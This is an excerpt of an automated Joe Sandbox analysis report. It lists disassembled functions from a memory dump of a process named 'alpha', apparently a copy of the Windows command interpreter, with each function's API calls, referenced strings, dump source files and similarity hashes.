                                                                              • API String ID: 3588551418-0
                                                                              • Opcode ID: 7b3e9ef8f9e00def7e0f555f85ef5a51875302e682b222ee2a1690b22849d021
                                                                              • Instruction ID: d39b1d57da928baf51656663d7fef851e4d344ab0cfb426899dc0003fe67f1d0
                                                                              • Opcode Fuzzy Hash: 7b3e9ef8f9e00def7e0f555f85ef5a51875302e682b222ee2a1690b22849d021
                                                                              • Instruction Fuzzy Hash: 84414971A1C646CBE618BF51E440679F661EB8CB91F145039D66E877B2CF2CE8408B40
                                                                              Function 00007FF64B58A73C Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF64B589A82), ref: 00007FF64B58A77A
                                                                              • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF64B589A82), ref: 00007FF64B58A7AF
                                                                              • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF64B589A82), ref: 00007FF64B58A80E
                                                                              • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF64B589A82), ref: 00007FF64B58A839
                                                                              • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF64B589A82), ref: 00007FF64B58A850
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: QueryValue$CloseErrorLastOpen
                                                                              • String ID:
                                                                              • API String ID: 2240656346-0
                                                                              • Opcode ID: 259df60cb868630656fe61ae38790f52a7232b22d9cc8ec1dbee3975f468035b
                                                                              • Instruction ID: c56ba5a04a4eed255044eaaad6c7eb7d116824ef77cedfcf72d76245dd0c7439
                                                                              • Opcode Fuzzy Hash: 259df60cb868630656fe61ae38790f52a7232b22d9cc8ec1dbee3975f468035b
                                                                              • Instruction Fuzzy Hash: C0317A32A2CA82C2E754AF25E44056AF7A4FF8C790F545034EA9EC2776DF3CD8528B00
                                                                              Function 00007FF64B58D0C0 Relevance: 7.6, APIs: 5, Instructions: 64COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00007FF64B5701B8: _get_osfhandle.MSVCRT ref: 00007FF64B5701C4
                                                                                • Part of subcall function 00007FF64B5701B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF64B57E904,?,?,?,?,00000000,00007FF64B573491,?,?,?,00007FF64B584420), ref: 00007FF64B5701D6
                                                                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF64B58D0F9
                                                                              • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF64B58D10F
                                                                              • ScrollConsoleScreenBufferW.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF64B58D166
                                                                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF64B58D17A
                                                                              • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF64B58D18C
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: Console$BufferHandleScreen$CursorFileInfoPositionScrollType_get_osfhandle
                                                                              • String ID:
                                                                              • API String ID: 3008996577-0
                                                                              • Opcode ID: cebe966d7df5a2bd0607568b5e1b41817dd61a68bafb8258f014fa92f4b8adc0
                                                                              • Instruction ID: ec01ec1265a9bb4c2a75e70d4fbbf97f3033e89f8aebcaea5c854f6c85c040b4
                                                                              • Opcode Fuzzy Hash: cebe966d7df5a2bd0607568b5e1b41817dd61a68bafb8258f014fa92f4b8adc0
                                                                              • Instruction Fuzzy Hash: 2F212B66B28651CAE704BF71E8000BDB7B0FB4DB54B449125DE1D93BA9EF38D045CB14
                                                                              Function 00007FF64B575CB4 Relevance: 7.5, APIs: 5, Instructions: 36synchronizationCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF64B58C9EE,?,?,?,00007FF64B58EA6C,?,?,?,00007FF64B58E925), ref: 00007FF64B575CCB
                                                                              • GetExitCodeProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?,?,00007FF64B58C9EE,?,?,?,00007FF64B58EA6C,?,?,?,00007FF64B58E925), ref: 00007FF64B575CDF
                                                                              • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF64B575D03
                                                                              • fprintf.MSVCRT ref: 00007FF64B57F4A9
                                                                              • fflush.MSVCRT ref: 00007FF64B57F4C2
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: CloseCodeExitHandleObjectProcessSingleWaitfflushfprintf
                                                                              • String ID:
                                                                              • API String ID: 1826527819-0
                                                                              • Opcode ID: 424fc31126f981a1d5e6876f03eadb09916e9ca5210b05511d0996a25080ff4f
                                                                              • Instruction ID: 226fd09c7911195c2206f81107b4245b0a54c7435314c46d4f6b7df9fcc4e9cd
                                                                              • Opcode Fuzzy Hash: 424fc31126f981a1d5e6876f03eadb09916e9ca5210b05511d0996a25080ff4f
                                                                              • Instruction Fuzzy Hash: 9C011B61A0C682CAE608BF25E4442B9FA61EB8EB55F449174E66F863B7CF7C90448B00
                                                                              Function 00007FF64B585770 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 169COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: CreateSemaphore
                                                                              • String ID: _p0$wil
                                                                              • API String ID: 1078844751-1814513734
                                                                              • Opcode ID: f755fc07889d6bdabc5bc906762bcb13605c747dc28133a8421b38486d33263f
                                                                              • Instruction ID: 1774e644ea6e8fe7090d07278b46bc2fa6c3e0fa01041f9f2d68f27cd038ed41
                                                                              • Opcode Fuzzy Hash: f755fc07889d6bdabc5bc906762bcb13605c747dc28133a8421b38486d33263f
                                                                              • Instruction Fuzzy Hash: 60511761B2D74286EE6ABF14E4543B9E290EF8CB90F644431DA2D877A2DF3CE415C740
                                                                              Function 00007FF64B58FB54 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 112COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: memset$DiskFreeSpace
                                                                              • String ID: %5lu
                                                                              • API String ID: 2448137811-2100233843
                                                                              • Opcode ID: a32004ad0b0cd9a1642accdea686924f5f32727604a55ba99b3828265f09f6cb
                                                                              • Instruction ID: f8b0b00f9624a0b7d0d8c9be8f897c02b33b8f4ecb48f271a27c8c8900604ab5
                                                                              • Opcode Fuzzy Hash: a32004ad0b0cd9a1642accdea686924f5f32727604a55ba99b3828265f09f6cb
                                                                              • Instruction Fuzzy Hash: 2141906270DAC185EB69FF51E8406EAB361FB88788F408035DA5D8B76ADF7CD649C700
                                                                              Function 00007FF64B58B89C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 104memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RtlCreateUnicodeStringFromAsciiz.NTDLL ref: 00007FF64B58B934
                                                                              • GlobalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF64B575085), ref: 00007FF64B58B9A5
                                                                              • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF64B575085), ref: 00007FF64B58B9F7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: Global$AllocAsciizCreateFreeFromStringUnicode
                                                                              • String ID: %WINDOWS_COPYRIGHT%
                                                                              • API String ID: 1103618819-1745581171
                                                                              • Opcode ID: 16d2b5de7a39f60598d54afa282db4830b4e4e1db5eb0a36e09c541776fa7494
                                                                              • Instruction ID: 77eec70ccc0d90e4c03f9b10699a33b6990f4e04fa2f20660088cad52afe0b41
                                                                              • Opcode Fuzzy Hash: 16d2b5de7a39f60598d54afa282db4830b4e4e1db5eb0a36e09c541776fa7494
                                                                              • Instruction Fuzzy Hash: 8741B262A1C786C2EB14BF11D410279B3A4FB4CB90F858231DAAD833A6EF3DE495C740
                                                                              Function 00007FF64B590774 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 86COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: memset$_wcslwr
                                                                              • String ID: [%s]
                                                                              • API String ID: 886762496-302437576
                                                                              • Opcode ID: eb4fc62ff4127de29e093c52d368a60165998186bbeaa5c9376a54b17af478ff
                                                                              • Instruction ID: 7cb0272f08fe8dce706243d83822ad74a5779816f697b1da8a23165d38ff4deb
                                                                              • Opcode Fuzzy Hash: eb4fc62ff4127de29e093c52d368a60165998186bbeaa5c9376a54b17af478ff
                                                                              • Instruction Fuzzy Hash: 6A316A72709B8285EB65EF21D8503E9A7A0FB8CB88F444135DA6D87766DF3CD6458700
                                                                              Function 00007FF64B5732E4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: iswspace
                                                                              • String ID: off
                                                                              • API String ID: 2389812497-733764931
                                                                              • Opcode ID: 23619b9e270ea0a6abcdd2ffa6124d8d0217e46963fde130039e410627268166
                                                                              • Instruction ID: 303d6325778763bf016db9159da6fee1d5bc4cc7c52bd8f83fe1565d2d1b246a
                                                                              • Opcode Fuzzy Hash: 23619b9e270ea0a6abcdd2ffa6124d8d0217e46963fde130039e410627268166
                                                                              • Instruction Fuzzy Hash: AE215C61F0C642C6FA78BF15D451279E6A1EF4DBA0F48C035D96EC76A6DEACE842C301
                                                                              Function 00007FF64B589308 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 56COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: wcschr$Heapiswspace$AllocProcess
                                                                              • String ID: %s=%s$DPATH$PATH
                                                                              • API String ID: 3731854180-3148396303
                                                                              • Opcode ID: ed2b41c8f7c1b35c8c8099a63381124b221818ea20370dab215de2e112638c1b
                                                                              • Instruction ID: 269661b5d8684a2fa1799a231819e27a837009b8c7e4bdf3d720756be804cb5b
                                                                              • Opcode Fuzzy Hash: ed2b41c8f7c1b35c8c8099a63381124b221818ea20370dab215de2e112638c1b
                                                                              • Instruction Fuzzy Hash: 40218B61B1D646C1EA6CBF59E4402B9B6A1AF8CB80F889135C92EC33B6DE6CE4508340
                                                                              Function 00007FF64B578198 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: wcscmp
                                                                              • String ID: *.*$????????.???
                                                                              • API String ID: 3392835482-3870530610
                                                                              • Opcode ID: 2267b9e2c7923373c3284e1f11a26023b10064941758683347217dc228a16a6c
                                                                              • Instruction ID: 1e4849d77ab6029bb458a40ceb3732025ae396cf5ffbac3d8e9346f06bbba59d
                                                                              • Opcode Fuzzy Hash: 2267b9e2c7923373c3284e1f11a26023b10064941758683347217dc228a16a6c
                                                                              • Instruction Fuzzy Hash: 88115625B2CA5281E768BF17E440539B2A1EB4CB81F199031DE5D87B66DE7DE4428700
                                                                              Function 00007FF64B589114 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: fprintf
                                                                              • String ID: CMD Internal Error %s$%s$Null environment
                                                                              • API String ID: 383729395-2781220306
                                                                              • Opcode ID: 0cb055b157f36561183311c9dd91b0f05aa56f2c0aaf14e14510f586112b26cc
                                                                              • Instruction ID: c160dc385bbc9ea9aaf0ee7b1ce2e3ea26720aab58dd353c5333071086da407d
                                                                              • Opcode Fuzzy Hash: 0cb055b157f36561183311c9dd91b0f05aa56f2c0aaf14e14510f586112b26cc
                                                                              • Instruction Fuzzy Hash: ED11912191C64292EB5EBF14E9440B9B261EB5CBF0F946331D67D832F6EF2CE4558740
                                                                              Function 00007FF64B5704F4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: AddressHandleModuleProc
                                                                              • String ID: KERNEL32.DLL$SetThreadUILanguage
                                                                              • API String ID: 1646373207-2530943252
                                                                              • Opcode ID: 33fd74526e8d725267334377f69302da3f837b9787d184b3d8809460f86dc4c4
                                                                              • Instruction ID: 886155444c70f446a74c6d09214fe5a26b6a8292c11058f439006e3b61b78a7d
                                                                              • Opcode Fuzzy Hash: 33fd74526e8d725267334377f69302da3f837b9787d184b3d8809460f86dc4c4
                                                                              • Instruction Fuzzy Hash: 2901C8A1B0DA06D1EA5CBF25E851134A2A0AF4D771F484736C93EC27F2DEBCA9819700
                                                                              Function 00007FF64B5873C0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 25libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: AddressHandleModuleProc
                                                                              • String ID: RaiseFailFastException$kernelbase.dll
                                                                              • API String ID: 1646373207-919018592
                                                                              • Opcode ID: 3febe13a05f537dc5e67cec473ac92f04f036d5fc975d7a9241dfcd9d5059c04
                                                                              • Instruction ID: b26996117113f076778bd58b074d6106c17336e6f9344d0c779fd4efc0c8da17
                                                                              • Opcode Fuzzy Hash: 3febe13a05f537dc5e67cec473ac92f04f036d5fc975d7a9241dfcd9d5059c04
                                                                              • Instruction Fuzzy Hash: 6DF0B761A1CB91D2EA08BF12F444069EA60EB8DF90B889535DA5E87B36CF6CD6958700
                                                                              Function 00007FF64B561130 Relevance: 6.2, APIs: 4, Instructions: 156COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: memset$CurrentDirectorytowupper
                                                                              • String ID:
                                                                              • API String ID: 1403193329-0
                                                                              • Opcode ID: 9eadb3359a7035c4c8b06301bcad4ec111c2959e7ad062144f1a1f931ae642b1
                                                                              • Instruction ID: 5b948392a2fd215b8b9496cbac39085a4720469a6015ec1a1816d0a7c1ccb033
                                                                              • Opcode Fuzzy Hash: 9eadb3359a7035c4c8b06301bcad4ec111c2959e7ad062144f1a1f931ae642b1
                                                                              • Instruction Fuzzy Hash: C3619D32A08B828AE728FF65D8402BDB7A4FB48348F145135DE6D836AADF38D451C700
                                                                              Function 00007FF64B574878 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: _wcsnicmp$wcschr
                                                                              • String ID:
                                                                              • API String ID: 3270668897-0
                                                                              • Opcode ID: c131fa53280227e888b319e24c815cf36435a05d61152e6198fec243a6d9d163
                                                                              • Instruction ID: e100c90a714fcf47b6fe56778d0b3a977615de46e10dcbbf9218f6822292ea22
                                                                              • Opcode Fuzzy Hash: c131fa53280227e888b319e24c815cf36435a05d61152e6198fec243a6d9d163
                                                                              • Instruction Fuzzy Hash: 6A518A51B0C74281FA69BF15E4101B9E3A5EF4DB80F48D431CA2E876F7EEACE9418350
                                                                              Function 00007FF64B573060 Relevance: 6.1, APIs: 4, Instructions: 98COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,0000000A,00007FF64B5692AC), ref: 00007FF64B5730CA
                                                                              • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF64B5730DD
                                                                              • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF64B5730F6
                                                                              • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF64B573106
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
